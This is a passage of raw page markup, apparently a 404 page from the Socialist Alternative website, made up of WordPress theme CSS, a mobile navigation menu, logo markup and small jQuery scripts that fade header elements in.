.sf-menu > .sfHover > a, .tds-button2:before, .tds-button6:before, .tds-progress-bar3 .tdm-progress-bar:after { border-color: #cc1a0e; } .tdm-btn-style1 { background-color: #cc1a0e; } .tdm-btn-style2:before { border-color: #cc1a0e; } .tdm-btn-style2 { color: #cc1a0e; } .tdm-btn-style3 { -webkit-box-shadow: 0 2px 16px #cc1a0e; -moz-box-shadow: 0 2px 16px #cc1a0e; box-shadow: 0 2px 16px #cc1a0e; } .tdm-btn-style3:hover { -webkit-box-shadow: 0 4px 26px #cc1a0e; -moz-box-shadow: 0 4px 26px #cc1a0e; box-shadow: 0 4px 26px #cc1a0e; } .tdm-header-style-1.td-header-wrap .td-header-top-menu-full, .tdm-header-style-1.td-header-wrap .top-header-menu .sub-menu, .tdm-header-style-2.td-header-wrap .td-header-top-menu-full, .tdm-header-style-2.td-header-wrap .top-header-menu .sub-menu, .tdm-header-style-3.td-header-wrap .td-header-top-menu-full, .tdm-header-style-3.td-header-wrap .top-header-menu .sub-menu{ background-color: #174970; } .tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu > .current-menu-item > a, .tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu > .current-menu-ancestor > a, .tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu > .current-category-ancestor > a, .tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu > li > a:hover, .tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu > .sfHover > a { color: rgba(255,255,255,0.7); } .tdm-menu-active-style4 .tdm-header .sf-menu > .current-menu-item > a, .tdm-menu-active-style4 .tdm-header .sf-menu > .current-menu-ancestor > a, .tdm-menu-active-style4 .tdm-header .sf-menu > .current-category-ancestor > a, .tdm-menu-active-style4 .tdm-header .sf-menu > li > a:hover, .tdm-menu-active-style4 .tdm-header .sf-menu > .sfHover > a { border-color: rgba(255,255,255,0.7); } .tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu > .current-menu-item > a, .tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu > .current-menu-ancestor > a, .tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu > .current-category-ancestor > a, .tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu > li > a:hover, .tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu > .sfHover > a { background-color: rgba(255,255,255,0.7); } .tdm-menu-active-style3 .tdm-header .td-affix .sf-menu > .current-menu-item > a, .tdm-menu-active-style3 .tdm-header .td-affix .sf-menu > .current-menu-ancestor > a, .tdm-menu-active-style3 .tdm-header .td-affix .sf-menu > .current-category-ancestor > a, .tdm-menu-active-style3 .tdm-header .td-affix .sf-menu > li > a:hover, .tdm-menu-active-style3 .tdm-header .td-affix .sf-menu > .sfHover > a { color: #ffffff; } .tdm-menu-active-style4 .tdm-header .td-affix .sf-menu > .current-menu-item > a, .tdm-menu-active-style4 .tdm-header .td-affix .sf-menu > .current-menu-ancestor > a, .tdm-menu-active-style4 .tdm-header .td-affix .sf-menu > .current-category-ancestor > a, .tdm-menu-active-style4 .tdm-header .td-affix .sf-menu > li > a:hover, .tdm-menu-active-style4 .tdm-header .td-affix .sf-menu > .sfHover > a { border-color: #ffffff; } .tdm-menu-active-style5 .tdm-header .td-header-menu-wrap.td-affix .sf-menu > .current-menu-item > a, .tdm-menu-active-style5 .tdm-header .td-header-menu-wrap.td-affix .sf-menu > .current-menu-ancestor > a, .tdm-menu-active-style5 .tdm-header .td-header-menu-wrap.td-affix .sf-menu > .current-category-ancestor > a, .tdm-menu-active-style5 .tdm-header .td-header-menu-wrap.td-affix .sf-menu > li > a:hover, .tdm-menu-active-style5 .tdm-header .td-header-menu-wrap.td-affix .sf-menu > .sfHover > a { background-color: #ffffff; } .tdm-menu-active-style2 .tdm-header ul.sf-menu > .td-menu-item, .tdm-menu-active-style4 .tdm-header ul.sf-menu > .td-menu-item, .tdm-header .tdm-header-menu-btns, .tdm-header-style-1 .td-main-menu-logo a, .tdm-header-style-2 .td-main-menu-logo a, .tdm-header-style-3 .td-main-menu-logo a { line-height: 70px; } .tdm-header-style-1 .td-main-menu-logo, .tdm-header-style-2 .td-main-menu-logo, .tdm-header-style-3 .td-main-menu-logo { height: 70px; } @media (min-width: 767px) { .tdm-header-style-1 .td-main-menu-logo img, .tdm-header-style-2 .td-main-menu-logo img, .tdm-header-style-3 .td-main-menu-logo img { max-height: 70px; } } </style> <style id="tdw-css-placeholder"></style></head> <body class="error404 woocommerce-no-js tdm-menu-active-style2 global-block-template-14 td-city td-animation-stack-type0 td-full-layout tdc-header-template" itemscope="itemscope" itemtype="https://schema.org/WebPage"> <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div> <div class="td-menu-background"></div> <div id="td-mobile-nav"> <div class="td-mobile-container"> <!-- mobile menu top section --> <div class="td-menu-socials-wrap"> <!-- socials --> <div class="td-menu-socials"> <span class="td-social-icon-wrap"> <a target="_blank" href="http://facebook.com/socialistalternativeusa" title="Facebook"> <i class="td-icon-font td-icon-facebook"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="http://instagram.com/socialist_alternative" title="Instagram"> <i class="td-icon-font td-icon-instagram"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="http://twitter.com/socialistalt" title="Twitter"> <i class="td-icon-font td-icon-twitter"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="https://www.youtube.com/channel/UC62u7RNy_5YdTgdOjkdRecg" title="Youtube"> <i class="td-icon-font td-icon-youtube"></i> </a> </span> </div> <!-- close button --> <div class="td-mobile-close"> <a href="#"><i class="td-icon-close-mobile"></i></a> </div> </div> <!-- login section --> <!-- menu section --> <div class="td-mobile-content"> <div class="menu-main-container"><ul id="menu-main" class="td-mobile-main-menu"><li id="menu-item-21298" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-first menu-item-21298"><a href="https://www.socialistalternative.org/join/">Join SA<i class="td-icon-menu-right td-element-after"></i></a> <ul class="sub-menu"> <li id="menu-item-40483" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-40483"><a href="https://www.socialistalternative.org/about/">About/What We Stand For</a></li> <li id="menu-item-42085" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-42085"><a href="http://www.socialistalternative.org/socialistmerch/">Socialist Merch</a></li> </ul> </li> <li id="menu-item-8416" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8416"><a href="https://www.socialistalternative.org/in-your-area/">In Your Area</a></li> <li id="menu-item-25613" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-25613"><a href="http://www.socialistalternative.org/category/top-stories/">News and Analysis<i class="td-icon-menu-right td-element-after"></i></a> <ul class="sub-menu"> <li id="menu-item-25629" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-25629"><a href="https://www.socialistalternative.org/category/us-politics/">U.S. Politics<i class="td-icon-menu-right td-element-after"></i></a> <ul class="sub-menu"> <li id="menu-item-25620" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25620"><a href="https://www.socialistalternative.org/category/fighting-racism/">Fighting Racism</a></li> <li id="menu-item-25621" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25621"><a href="https://www.socialistalternative.org/category/healthcare/">Health Care</a></li> <li id="menu-item-25623" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25623"><a href="https://www.socialistalternative.org/category/immigrants-rights/">Immigrants Rights</a></li> <li id="menu-item-25624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25624"><a href="https://www.socialistalternative.org/category/lgbt-rights/">LGBTQ Rights</a></li> <li id="menu-item-25633" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25633"><a href="https://www.socialistalternative.org/category/womens-rights/">Women&#8217;s Rights</a></li> <li id="menu-item-25634" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25634"><a href="https://www.socialistalternative.org/category/workers-movement/">Workers&#8217; Movement</a></li> <li id="menu-item-25615" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25615"><a href="https://www.socialistalternative.org/category/culture/">Culture</a></li> <li id="menu-item-25616" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25616"><a href="https://www.socialistalternative.org/category/economy/">Economy</a></li> </ul> </li> <li id="menu-item-25635" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25635"><a href="https://www.socialistalternative.org/category/world-events/">World Events</a></li> <li id="menu-item-25636" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25636"><a href="https://www.socialistalternative.org/category/youth-students/">Youth &amp; Students</a></li> <li id="menu-item-25618" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25618"><a href="https://www.socialistalternative.org/category/environment/">Environment</a></li> <li id="menu-item-25626" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-25626"><a href="https://www.socialistalternative.org/category/socialist-alternative-in-action/">Socialist Alternative In Action<i class="td-icon-menu-right td-element-after"></i></a> <ul class="sub-menu"> <li id="menu-item-27839" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27839"><a href="https://www.socialistalternative.org/category/socialist-alternative-in-action/documents-leaflets-statements/">Documents &amp; Leaflets &amp; Statements</a></li> </ul> </li> <li id="menu-item-25631" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25631"><a href="https://www.socialistalternative.org/category/videos/">Videos</a></li> <li id="menu-item-25622" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-25622"><a href="https://www.socialistalternative.org/category/history/">History<i class="td-icon-menu-right td-element-after"></i></a> <ul class="sub-menu"> <li id="menu-item-27837" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27837"><a href="https://www.socialistalternative.org/category/history/centenary-of-russian-revolution/">Centenary of the Russian Revolution</a></li> </ul> </li> <li id="menu-item-25627" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25627"><a href="https://www.socialistalternative.org/category/theory/">Theory</a></li> </ul> </li> <li id="menu-item-8465" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8465"><a href="http://www.socialistworld.net">World News</a></li> <li id="menu-item-13889" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-13889"><a href="https://www.socialistalternative.org/publications/">Publications<i class="td-icon-menu-right td-element-after"></i></a> <ul class="sub-menu"> <li id="menu-item-24518" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24518"><a href="https://www.socialistalternative.org/publications/">Books and Pamphlets</a></li> <li id="menu-item-24519" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-24519"><a href="https://www.socialistalternative.org/dual-subscription-deal/">Newspaper</a></li> </ul> </li> <li id="menu-item-21308" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21308"><a href="https://www.socialistalternative.org/category/en-espanol/">en español</a></li> <li id="menu-item-25670" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-25670"><a href="/donate">Donate</a></li> </ul></div> </div> </div> <!-- register/login section --> </div> <div class="td-search-background"></div> <div class="td-search-wrap-mob"> <div class="td-drop-down-search" aria-labelledby="td-header-search-button"> <form method="get" class="td-search-form" action="https://www.socialistalternative.org/"> <!-- close button --> <div class="td-search-close"> <a href="#"><i class="td-icon-close-mobile"></i></a> </div> <div role="search" class="td-search-input"> <span>Search</span> <input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" /> </div> </form> <div id="td-aj-search-mob"></div> </div> </div> <style> @media (max-width: 767px) { .td-header-desktop-wrap { display: none; } } @media (min-width: 767px) { .td-header-mobile-wrap { display: none; } } </style> <div id="td-outer-wrap" class="td-theme-wrap"> <div class="td-header-template-wrap" style="position: relative"> <div class="td-header-mobile-wrap "> <div id="td_uid_1_5cdd903e26f66" class="tdc-zone"><div class="tdc_zone td_uid_1_5cdd903e26f76_rand wpb_row td-pb-row tdc-element-style" > <style scoped> /* custom css */ .td_uid_1_5cdd903e26f76_rand { min-height: 0; } .td-header-mobile-wrap { position: relative; width: 100%; } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_1_5cdd903e26f76_rand{ position:relative; } } </style> <div class="td_uid_1_5cdd903e26f66_rand_style td-element-style" ><style> /* phone */ @media (max-width: 767px) { .td_uid_1_5cdd903e26f66_rand_style{ background-color:#ffffff !important; } } </style></div><div id="td_uid_2_5cdd903e2785b" class="tdc-row"><div class="vc_row td_uid_2_5cdd903e27861_rand wpb_row td-pb-row tdc-element-style" > <style scoped> /* custom css */ .td_uid_2_5cdd903e27861_rand { min-height: 0; } /* phone */ @media (max-width: 767px){ @media (min-width: 768px) { .td_uid_2_5cdd903e27861_rand { margin-left: -0px; margin-right: -0px; } .td_uid_2_5cdd903e27861_rand .vc_column { padding-left: 0px; padding-right: 0px; } } #td_uid_2_5cdd903e2785b { position: relative; } #td_uid_2_5cdd903e2785b:before { display: block; width: 100vw; height: 100%; position: absolute; left: 50%; transform: translateX(-50%); box-shadow: 0px 6px 8px 0px rgba(0, 0, 0, 0.08); z-index: 20; pointer-events: none; } } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_2_5cdd903e27861_rand{ position:relative; } } </style> <div class="td_uid_2_5cdd903e2785b_rand_style td-element-style" style="opacity: 0; transition: opacity 1s;"><style> /* phone */ @media (max-width: 767px) { .td_uid_2_5cdd903e2785b_rand_style{ background-color:#cc1e12 !important; } } </style></div><div class="vc_column td_uid_3_5cdd903e27afe_rand wpb_column vc_column_container tdc-column td-pb-span4"> <style scoped> /* custom css */ .td_uid_3_5cdd903e27afe_rand { vertical-align: baseline; } /* phone */ @media (max-width: 767px){ .td_uid_3_5cdd903e27afe_rand { vertical-align: middle; } } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_3_5cdd903e27afe_rand{ width:20% !important; display:inline-block !important; } } </style><div class="wpb_wrapper"><div class="td_block_wrap tdb_mobile_menu td_uid_4_5cdd903e27da3_rand td-pb-border-top td_block_template_14 tdb-header-align" data-td-block-uid="td_uid_4_5cdd903e27da3" > <style> /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_4_5cdd903e27da3_rand{ margin-left:-13px !important; } } </style> <style> /* custom css */ .td_uid_4_5cdd903e27da3_rand { display: inline-block; } .td_uid_4_5cdd903e27da3_rand #tdb-mobile-menu-button i { font-size: 22px; } .td_uid_4_5cdd903e27da3_rand #tdb-mobile-menu-button i { width: 55px; height: 55px; line-height: 55px; } .td_uid_4_5cdd903e27da3_rand #tdb-mobile-menu-button { color: #ffffff; } /* phone */ @media (max-width: 767px){ .td_uid_4_5cdd903e27da3_rand #tdb-mobile-menu-button i { font-size: 27px; } .td_uid_4_5cdd903e27da3_rand #tdb-mobile-menu-button i { width: 54px; height: 54px; line-height: 54px; } } </style><div class="tdb-block-inner td-fix-index"><a id="tdb-mobile-menu-button" href="#"><i class="tdb-mobile-menu-icon td-icon-mobile"></i></a></div></div> <!-- ./block --></div></div><div class="vc_column td_uid_5_5cdd903e281ba_rand wpb_column vc_column_container tdc-column td-pb-span4"> <style scoped> /* custom css */ .td_uid_5_5cdd903e281ba_rand { vertical-align: baseline; } /* phone */ @media (max-width: 767px){ .td_uid_5_5cdd903e281ba_rand { vertical-align: middle; } } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_5_5cdd903e281ba_rand{ width:60% !important; display:inline-block !important; } } </style><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_logo td_uid_6_5cdd903e285d3_rand td-pb-border-top td_block_template_14 tdb-header-align" data-td-block-uid="td_uid_6_5cdd903e285d3" > <style> /* custom css */ .td_uid_6_5cdd903e285d3_rand .tdb-logo-a, .td_uid_6_5cdd903e285d3_rand h1 { flex-direction: row; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-a, .td_uid_6_5cdd903e285d3_rand h1 { align-items: flex-end; } .td_uid_6_5cdd903e285d3_rand { text-align: center; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-a, .td_uid_6_5cdd903e285d3_rand h1 { justify-content: center; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-img-wrap { margin-right: 5px; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-img-wrap:last-child { margin-right: 0; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-img-wrap { margin-bottom: 0px; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-img-wrap:last-child { margin-bottom: 0; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-img-wrap { display: block; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-text-tagline { margin-top: -2px; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-text-title { display: block; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-text-tagline { display: block; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-text-title, .td_uid_6_5cdd903e285d3_rand .tdb-logo-text-tagline { display: block; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-text-tagline { text-align: center; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-icon { top: 0px; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-icon { display: block; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-text-title { color: #ffffff; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-text-tagline { color: #ffffff; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-text-title { font-family:Oswald !important;font-size:20px !important;text-transform:uppercase !important;; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-text-tagline { font-family:Open Sans !important;font-size:12px !important;; } /* phone */ @media (max-width: 767px){ .td_uid_6_5cdd903e285d3_rand .tdb-logo-img { max-width: 140px; } .td_uid_6_5cdd903e285d3_rand .tdb-logo-text-tagline { font-family:Open Sans !important;font-size:11px !important;; } } </style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://www.socialistalternative.org/"><div class="tdb-logo-img-wrap"><img class="tdb-logo-img" src="https://www.socialistalternative.org/wp-content/uploads/2019/02/whitelogo-1.png" alt="" title="" /></div></a></div></div> <!-- ./block --></div></div><div class="vc_column td_uid_7_5cdd903e2d6a0_rand wpb_column vc_column_container tdc-column td-pb-span4"> <style scoped> /* custom css */ .td_uid_7_5cdd903e2d6a0_rand { vertical-align: baseline; } /* phone */ @media (max-width: 767px){ .td_uid_7_5cdd903e2d6a0_rand { vertical-align: middle; } } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_7_5cdd903e2d6a0_rand{ width:20% !important; display:inline-block !important; } } </style><div class="wpb_wrapper"><div class="td_block_wrap tdb_mobile_search td_uid_8_5cdd903e2d9e4_rand td-pb-border-top td_block_template_14 tdb-header-align" data-td-block-uid="td_uid_8_5cdd903e2d9e4" > <style> /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_8_5cdd903e2d9e4_rand{ margin-right:-19px !important; margin-bottom:0px !important; } } </style> <style> /* custom css */ .td_uid_8_5cdd903e2d9e4_rand { display: inline-block; } .td_uid_8_5cdd903e2d9e4_rand { float: right; } .td_uid_8_5cdd903e2d9e4_rand #tdb-header-search-button-mob i { font-size: 22px; } .td_uid_8_5cdd903e2d9e4_rand #tdb-header-search-button-mob i { width: 55px; height: 55px; line-height: 55px; } .td_uid_8_5cdd903e2d9e4_rand #tdb-header-search-button-mob { color: #ffffff; } </style><div class="tdb-block-inner td-fix-index"><a id="tdb-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="tdb-mobile-search-icon td-icon-search"></i></a></div></div> <!-- ./block --></div></div></div></div> <script> jQuery(window).load(function () { jQuery('body').find('#td_uid_2_5cdd903e2785b .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); </script> <script> jQuery(window).ready(function () { // We need timeout because the content must be rendered and interpreted on client setTimeout(function () { var $content = jQuery('body').find('#tdc-live-iframe'), refWindow = undefined; if ($content.length) { $content = $content.contents(); refWindow = document.getElementById('tdc-live-iframe').contentWindow || document.getElementById('tdc-live-iframe').contentDocument; } else { $content = jQuery('body'); refWindow = window; } $content.find('#td_uid_2_5cdd903e2785b .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); }, 200); </script> <div id="td_uid_6_5cdd903e2db5e" class="tdc-row"><div class="vc_row td_uid_9_5cdd903e2db64_rand wpb_row td-pb-row" > <style scoped> /* custom css */ .td_uid_9_5cdd903e2db64_rand { min-height: 0; } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_9_5cdd903e2db64_rand{ padding-top:32px !important; } } </style><div class="vc_column td_uid_10_5cdd903e2dd2f_rand wpb_column vc_column_container tdc-column td-pb-span12"> <style scoped> /* custom css */ .td_uid_10_5cdd903e2dd2f_rand { vertical-align: baseline; } </style><div class="wpb_wrapper"></div></div></div></div> <script> jQuery(window).load(function () { jQuery('body').find('#td_uid_6_5cdd903e2db5e .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); </script> <script> jQuery(window).ready(function () { // We need timeout because the content must be rendered and interpreted on client setTimeout(function () { var $content = jQuery('body').find('#tdc-live-iframe'), refWindow = undefined; if ($content.length) { $content = $content.contents(); refWindow = document.getElementById('tdc-live-iframe').contentWindow || document.getElementById('tdc-live-iframe').contentDocument; } else { $content = jQuery('body'); refWindow = window; } $content.find('#td_uid_6_5cdd903e2db5e .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); }, 200); </script> </div></div> <script> jQuery(window).load(function () { jQuery('body').find('#td_uid_1_5cdd903e26f66 .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); </script> <script> jQuery(window).ready(function () { // We need timeout because the content must be rendered and interpreted on client setTimeout(function () { var $content = jQuery('body').find('#tdc-live-iframe'), refWindow = undefined; if ($content.length) { $content = $content.contents(); refWindow = document.getElementById('tdc-live-iframe').contentWindow || document.getElementById('tdc-live-iframe').contentDocument; } else { $content = jQuery('body'); refWindow = window; } $content.find('#td_uid_1_5cdd903e26f66 .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); }, 200); </script> </div> <div class="td-header-mobile-sticky-wrap tdc-zone-sticky-invisible tdc-zone-sticky-inactive" style="display: none"> <div id="td_uid_8_5cdd903e2e2c4" class="tdc-zone"><div class="tdc_zone td_uid_12_5cdd903e2e2ca_rand wpb_row td-pb-row tdc-element-style td-header-sticky-smart" data-sticky-offset="0" > <style scoped> /* custom css */ .td_uid_12_5cdd903e2e2ca_rand { min-height: 0; } .td-header-mobile-sticky-wrap.td-header-active { opacity: 1; } .td-header-mobile-sticky-wrap { -webkit-transition: all 0.3s ease-in-out; -moz-transition: all 0.3s ease-in-out; -o-transition: all 0.3s ease-in-out; transition: all 0.3s ease-in-out; } /* phone */ @media (max-width: 767px){ #td_uid_8_5cdd903e2e2c4 { position: relative; } #td_uid_8_5cdd903e2e2c4:before { content: ''; display: block; width: 100vw; height: 100%; position: absolute; left: 50%; transform: translateX(-50%); box-shadow: 0px 6px 8px 0px rgba(0, 0, 0, 0.08); z-index: 20; pointer-events: none; } @media (max-width: 767px) { #td_uid_8_5cdd903e2e2c4:before { width: 100%; } } .td-header-mobile-sticky-wrap { transform: translateY(-120%); -webkit-transform: translateY(-120%); -moz-transform: translateY(-120%); -ms-transform: translateY(-120%); -o-transform: translateY(-120%); } .td-header-mobile-sticky-wrap.td-header-active { transform: translateY(0); -webkit-transform: translateY(0); -moz-transform: translateY(0); -ms-transform: translateY(0); -o-transform: translateY(0); } } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_12_5cdd903e2e2ca_rand{ position:relative; } } </style> <div class="td_uid_8_5cdd903e2e2c4_rand_style td-element-style" ><style> /* phone */ @media (max-width: 767px) { .td_uid_8_5cdd903e2e2c4_rand_style{ background-color:#ea2e2e !important; } } </style></div><div id="td_uid_9_5cdd903e2e525" class="tdc-row"><div class="vc_row td_uid_13_5cdd903e2e52a_rand wpb_row td-pb-row tdc-element-style" > <style scoped> /* custom css */ .td_uid_13_5cdd903e2e52a_rand { min-height: 0; } /* phone */ @media (max-width: 767px){ @media (min-width: 768px) { .td_uid_13_5cdd903e2e52a_rand { margin-left: -0px; margin-right: -0px; } .td_uid_13_5cdd903e2e52a_rand .vc_column { padding-left: 0px; padding-right: 0px; } } } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_13_5cdd903e2e52a_rand{ position:relative; } } </style> <div class="td_uid_9_5cdd903e2e525_rand_style td-element-style" style="opacity: 0; transition: opacity 1s;"><style> /* phone */ @media (max-width: 767px) { .td_uid_9_5cdd903e2e525_rand_style{ background-color:#cc1e12 !important; } } </style></div><div class="vc_column td_uid_14_5cdd903e2e6c8_rand wpb_column vc_column_container tdc-column td-pb-span4"> <style scoped> /* custom css */ .td_uid_14_5cdd903e2e6c8_rand { vertical-align: baseline; } /* phone */ @media (max-width: 767px){ .td_uid_14_5cdd903e2e6c8_rand { vertical-align: middle; } } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_14_5cdd903e2e6c8_rand{ width:20% !important; display:inline-block !important; } } </style><div class="wpb_wrapper"><div class="td_block_wrap tdb_mobile_menu td_uid_15_5cdd903e2e819_rand td-pb-border-top td_block_template_14 tdb-header-align" data-td-block-uid="td_uid_15_5cdd903e2e819" > <style> /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_15_5cdd903e2e819_rand{ margin-left:-13px !important; } } </style> <style> /* custom css */ .td_uid_15_5cdd903e2e819_rand { display: inline-block; } .td_uid_15_5cdd903e2e819_rand #tdb-mobile-menu-button i { font-size: 22px; } .td_uid_15_5cdd903e2e819_rand #tdb-mobile-menu-button i { width: 55px; height: 55px; line-height: 55px; } .td_uid_15_5cdd903e2e819_rand #tdb-mobile-menu-button { color: #ffffff; } /* phone */ @media (max-width: 767px){ .td_uid_15_5cdd903e2e819_rand #tdb-mobile-menu-button i { font-size: 27px; } .td_uid_15_5cdd903e2e819_rand #tdb-mobile-menu-button i { width: 54px; height: 54px; line-height: 54px; } } </style><div class="tdb-block-inner td-fix-index"><a id="tdb-mobile-menu-button" href="#"><i class="tdb-mobile-menu-icon td-icon-mobile"></i></a></div></div> <!-- ./block --></div></div><div class="vc_column td_uid_16_5cdd903e2e958_rand wpb_column vc_column_container tdc-column td-pb-span4"> <style scoped> /* custom css */ .td_uid_16_5cdd903e2e958_rand { vertical-align: baseline; } /* phone */ @media (max-width: 767px){ .td_uid_16_5cdd903e2e958_rand { vertical-align: middle; } } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_16_5cdd903e2e958_rand{ width:60% !important; display:inline-block !important; } } </style><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_logo td_uid_17_5cdd903e2ea63_rand td-pb-border-top td_block_template_14 tdb-header-align" data-td-block-uid="td_uid_17_5cdd903e2ea63" > <style> /* custom css */ .td_uid_17_5cdd903e2ea63_rand .tdb-logo-a, .td_uid_17_5cdd903e2ea63_rand h1 { flex-direction: row; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-a, .td_uid_17_5cdd903e2ea63_rand h1 { align-items: flex-end; } .td_uid_17_5cdd903e2ea63_rand { text-align: center; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-a, .td_uid_17_5cdd903e2ea63_rand h1 { justify-content: center; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-img-wrap { margin-right: 5px; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-img-wrap:last-child { margin-right: 0; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-img-wrap { margin-bottom: 0px; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-img-wrap:last-child { margin-bottom: 0; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-img-wrap { display: block; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-text-tagline { margin-top: -2px; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-text-title { display: block; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-text-tagline { display: block; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-text-title, .td_uid_17_5cdd903e2ea63_rand .tdb-logo-text-tagline { display: block; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-text-tagline { text-align: center; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-icon { top: 0px; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-icon { display: block; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-text-title { color: #ffffff; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-text-tagline { color: #ffffff; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-text-title { font-family:Oswald !important;font-size:20px !important;text-transform:uppercase !important;; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-text-tagline { font-family:Open Sans !important;font-size:12px !important;; } /* phone */ @media (max-width: 767px){ .td_uid_17_5cdd903e2ea63_rand .tdb-logo-img { max-width: 140px; } .td_uid_17_5cdd903e2ea63_rand .tdb-logo-text-tagline { font-family:Open Sans !important;font-size:11px !important;; } } </style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://www.socialistalternative.org/"><div class="tdb-logo-img-wrap"><img class="tdb-logo-img" src="https://www.socialistalternative.org/wp-content/uploads/2019/02/whitelogo-1.png" alt="" title="" /></div></a></div></div> <!-- ./block --></div></div><div class="vc_column td_uid_18_5cdd903e330d8_rand wpb_column vc_column_container tdc-column td-pb-span4"> <style scoped> /* custom css */ .td_uid_18_5cdd903e330d8_rand { vertical-align: baseline; } /* phone */ @media (max-width: 767px){ .td_uid_18_5cdd903e330d8_rand { vertical-align: middle; } } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { 